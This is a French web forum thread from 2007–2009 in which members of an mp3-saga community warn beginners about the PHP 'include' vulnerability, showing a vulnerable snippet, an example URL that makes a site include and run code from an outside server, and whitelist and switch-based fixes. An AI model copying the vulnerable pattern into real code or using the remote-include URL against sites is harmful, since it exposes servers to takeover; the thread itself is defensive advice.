Netophonix - Le forum

Un petit univers pour les aventures, series, sketch en mp3 libre sur le net. Informez-vous et discutez sur toutes les sagas mp3.
Nous sommes actuellement le Jeu 24 Août 2017, 08:48
Rechercher dans tout le forum :

Le fuseau horaire est réglé sur UTC+1 heure [Heure d’été]


Publier un nouveau sujet Répondre au sujet  [ 35 messages ]  Atteindre la page 1, 2, 3  Suivant
Auteur Message
Message Publié : Dim 11 Fév 2007, 00:07  −  Sujet du message : La Faille Include
Répondre en citant
Créateur
Créateur | Créateur | Créatrice
Avatar de l’utilisateur
GENDER_M17 posts
Inscription : 28 Janvier 07
C'est dernier temp j'ai vu des site en php (de saga mp3 ou pas) qui uttilisait la fonction "include" tant connu...

Mais pour bon nombre de webmaster, cette fonction est aussi associer a la faille "include".
C'est pour sa que j'ai créer ce topic, pour prévenir les débutant en php de ne pas tomber dans le piege qui pourait ravir les Hackers.

Exemple de faille include dans une page PHP:

Code:
$page = $_GET['page'];
include($page.".php");


Dans ce cas, le nom du fichier est récupérer puis le fichiet php est inclus et le script est exécuter par le serveur....

L'URL du site serait alors quelque chose comme:
    http://lesite.com/index.php?page=test
Le fichier test.php est donc inclus...

Mais imaginez qu'un internaute malveillant arrive sur votre site, et découvre que votre site comporte cette faille.... Il n'aurait plus qu'a ecrire ceci

    http://lesite.com/index.php?page=http://sonsite.com/hacking
Dans ce cas le script sur sont serveur est exécuter sur le votre....Il peut donc exécuter ce qu'il veut sur votre serveur.

voici un exemple de sécuriter que vous pouvez utiiser pour eviter cela:

Code:
$page = $_GET['page'];// On récupére le nom de la page

$securiter = array("test","test2"); //on fait un tableau des pages autoriser

for($i=0; ;$i++){  //On créer une boucle de vérification
if( $page == $securiter[$i])break;
if(empty($securiter[$i])) exit("Hacking stoppé"); }

include($page.".php"); //on inclus la page


Avec ça, on est certain que aucune autres pages viendrons perturber le bon fonctionnement de votre site internet

Fondateur de DukeTotchi....


Haut
 Profil  
 
Message Publié : Lun 12 Fév 2007, 17:47 
Répondre en citant
Créateur
Créateur | Créateur | Créatrice
Avatar de l’utilisateur
GENDER_M66 posts
Inscription : 17 Janvier 07
Merci de veiller à la sécurité de nos site webs ^^

Une ligue pas comme les autres sur http://lcj.ifrance.com


Haut
 Profil  
 
Message Publié : Mar 27 Fév 2007, 22:49 
Répondre en citant
Créateur
Créateur | Créateur | Créatrice
Avatar de l’utilisateur
GENDER_M17 posts
Inscription : 28 Janvier 07
de rien...

Fondateur de DukeTotchi....


Haut
 Profil  
 
Message Publié : Sam 17 Mars 2007, 18:46 
Répondre en citant
Neto-Chroniqueur
Neto-Chroniqueur | Neto-Chroniqueur | Neto-Chroniqueuse
GENDER_M 28 ans · 344 posts
Inscription : 15 Janvier 07
Donc si j'ai bien compris tu entre tout les pages autorisé dans la bdd, et après tu vérifie la page demandé


Haut
 Profil  
 
Message Publié : Mar 03 Avr 2007, 18:53 
Répondre en citant
Postulant
Postulant | Postulant | Postulante
Avatar de l’utilisateur
GENDER_M10 posts
Inscription : 2 Avril 07
Je suis pas d'accord avec toi, a mon avis un bon vieux switch est plus efficace dans ce genre

Code:
$page = $_GET['page']

switch $page
 case "index":
  include('index.php');
  break;

 case "forum":
   include('forum.php');
   break;

Ect ...



Citer:
Donc si j'ai bien compris tu entre tout les pages autorisé dans la bdd, et après tu vérifie la page demandé

Non pas dans la bdd, mais dans un array

PHP : Programmation Hyper Puissante !! (Si Si !)


Dernière édition par Cekos le Lun 09 Avr 2007, 20:17, édité 1 fois.

Haut
 Profil  
 
Message Publié : Mar 03 Avr 2007, 19:03 
Répondre en citant
Neto-Chroniqueur
Neto-Chroniqueur | Neto-Chroniqueur | Neto-Chroniqueuse
GENDER_M 28 ans · 344 posts
Inscription : 15 Janvier 07
Et ben moi je met tout dans la BDD ^^


Haut
 Profil  
 
Message Publié : Dim 10 Juin 2007, 11:23 
Répondre en citant
Créateur
Créateur | Créateur | Créatrice
GENDER_M65 posts
Inscription : 21 Mai 07
A travaillé sur :
Le Collègebeuk



mono-mp3-Soldat Ryan
Si leur script s'appelle forum.php vous êtes mort quoi ^^
Moi j'utilise la méthode barbare du site du zero



Haut
 Profil  
 
Message Publié : Dim 10 Juin 2007, 11:33 
Répondre en citant
Neto-Chroniqueur
Neto-Chroniqueur | Neto-Chroniqueur | Neto-Chroniqueuse
GENDER_M 28 ans · 344 posts
Inscription : 15 Janvier 07
Mort non car comment veux-tu qu'il est mit dans ton ftp le meme fichier que toi ?

Si il doivent appeler un fichier extérieur au site c'est sous la forme http://lalal.com/forum.php
Donc aucun risque


Haut
 Profil  
 
Message Publié : Jeu 16 Oct 2008, 20:36 
Répondre en citant
Postulant
Postulant | Postulant | Postulante
Avatar de l’utilisateur
GENDER_M 53 ans · 41 posts
Inscription : 26 Juillet 08
J'hésite entre dire que ça reviens à être atteint de paranoïa aiguë et dire que c'est primordial ...
Sachant que la plupart des gens qui vont sur les sites de sagas mp3 sont :
- soit des buses en informatique
- soit des lammouzes
- soit des programmeurs "propres"
- soit des bonnes gens tout à fait sympathiques

je ne voit pas trop l'intérêt de cette sécurité (malgré tout, plus un site est sécurisé, mieux c'est ...)

Sinon, je te/vous remercie pour cette bienveillance :)

Image


Haut
 Profil  
 
Message Publié : Lun 02 Mars 2009, 19:24 
Répondre en citant
Créateur
Créateur | Créateur | Créatrice
Avatar de l’utilisateur
GENDER_M 23 ans · 219 posts
Inscription : 2 Mars 09
A travaillé sur :
Live Origin's :: La légendes des éléments :: Gerbe Of War-Arrêté :: Sonzuko mp3 Story (Acteur) - de Revan :: Banane , Ninjas et Katanas.(Acteur) - De Verdey :: Chaostica(Acteur) - De Art-Of-Kawaii :: Les Avant-Tu-Riais de la SOCQATOA (Figurant) - De Dychollin :: Am Stram Gram (Créateur avec SilverSon) :: Stupidy World (Acteur, de Tesk1chien) :: 2012-2036 (Acteur, de Khos) ::
[Bonnet d'âne]

Hmm La faille incluse :smt007

C'est vrais que c'est pas térrible quand on ne veut pas se faire hacké .
Après ceux qui veulent ce faire hacké ( Mazo ) Vous pouvez éssayé ceci, Faut mettre surtout vos compte banquaire pour plus de sensation !


Allez bonne journée !

XD LOL PTDR MDR ... :smt012

[Edit Blast : ça faisait longtemps qu'on avait pas eu un petit boulet.]


Image



Ce message a valu à son auteur un bonnet d'âne, remis par Blast le Lun 02 Mars 2009, 19:35.

Haut
 Profil  
 
Message Publié : Lun 02 Mars 2009, 19:34 
Répondre en citant
Administrateur
Administrateur | Administrateur | Administratrice
Avatar de l’utilisateur
GENDER_M4761 posts
Inscription : 21 Janvier 07
Tu m'expliques l'intérêt de ce message? Ce que viennent faire là ces espèces de pseudos-smileys sms? Si c'est de l'humour, ce n'est ni fin ni drôle. Zéro intérêt, zéro contenu, orthographe minimale et sms... La prochaine fois, abstiens toi.

Edition: Raaah... Grillé par Blast pour le bonnet. Tant pis, je lui ai fauché le message de modération. :D

→ Pour accéder à un groupe, je vous encourage à contacter Blast.
→ Pour les points techniques, vous êtes au bon endroit.

:}


Dernière édition par Kak Miortvi Pengvin le Lun 02 Mars 2009, 19:38, édité 1 fois.

Haut
 Profil  
 
Message Publié : Lun 02 Mars 2009, 19:35 
Répondre en citant
Créateur
Créateur | Créateur | Créatrice
Avatar de l’utilisateur
GENDER_M 22 ans · 458 posts
Inscription : 24 Août 08
A travaillé sur :
Rien de correct
Alors rien que pour rigoler , j'ai essayé , et oui , c'est dangereux. Disons que j'ai réussi a supprimer la page via un script un peu trop bricolé.
Cependant , je rejoins l'avis de Cekos , un bon vieux switch est efficace.

Pour plus de renseignements : HackBBS = Exploit des Failles en PHP sur un site Web
(Je ne suis aucunement responsable de ce que vous trouverez sur ce site)


Haut
 Profil  
 
Message Publié : Lun 02 Mars 2009, 20:25 
Répondre en citant
Créateur
Créateur | Créateur | Créatrice
Avatar de l’utilisateur
GENDER_M 26 ans · 548 posts
Inscription : 7 Mai 08
A travaillé sur :
Les Chroniques de Ravnica, Arena, Assassin, Derniers jours de Szadec, Pong de Ark

Prochainement dans :

L.C.D.N : L'Aube du Chaos de Dychollin,Hard Life de Sim, Résistance de Szadec et Abolition de Destra.
Bravo Dark, c'est simple et très compréhensible ;)

(pense tout de même à la relecture...)

Image
Image
Image



Haut
 Profil  
 
Message Publié : Lun 02 Mars 2009, 20:32 
Répondre en citant
Administrateur
Administrateur | Administrateur | Administratrice
Avatar de l’utilisateur
GENDER_M4761 posts
Inscription : 21 Janvier 07
Alinor, tu parles à un membre qui a posté il y a deux ans...

→ Pour accéder à un groupe, je vous encourage à contacter Blast.
→ Pour les points techniques, vous êtes au bon endroit.

:}


Haut
 Profil  
 
Message Publié : Lun 02 Mars 2009, 21:00 
Répondre en citant
Créateur
Créateur | Créateur | Créatrice
Avatar de l’utilisateur
GENDER_M 23 ans · 219 posts
Inscription : 2 Mars 09
A travaillé sur :
Live Origin's :: La légendes des éléments :: Gerbe Of War-Arrêté :: Sonzuko mp3 Story (Acteur) - de Revan :: Banane , Ninjas et Katanas.(Acteur) - De Verdey :: Chaostica(Acteur) - De Art-Of-Kawaii :: Les Avant-Tu-Riais de la SOCQATOA (Figurant) - De Dychollin :: Am Stram Gram (Créateur avec SilverSon) :: Stupidy World (Acteur, de Tesk1chien) :: 2012-2036 (Acteur, de Khos) ::
Ah d'accord c'est pour ça le bonnet ! Message d'humour ...

Image



Haut
 Profil  
 
Afficher les messages publiés depuis:  Trier par  
Publier un nouveau sujet Répondre au sujet  [ 35 messages ]  Atteindre la page 1, 2, 3  Suivant

Le fuseau horaire est réglé sur UTC+1 heure [Heure d’été]


Qui est en ligne ?

Utilisateurs parcourant ce forum : Aucun utilisateur inscrit et 0 invités


Vous ne pouvez pas publier de nouveaux sujets dans ce forum
Vous ne pouvez pas répondre aux sujets dans ce forum
Vous ne pouvez pas éditer vos messages dans ce forum
Vous ne pouvez pas supprimer vos messages dans ce forum
Vous ne pouvez pas transférer de pièces jointes dans ce forum

Rechercher :
Atteindre:  


Powered by phpBB © 2000-2007 phpBB Group
Traduction française officielle © Maël Soucaze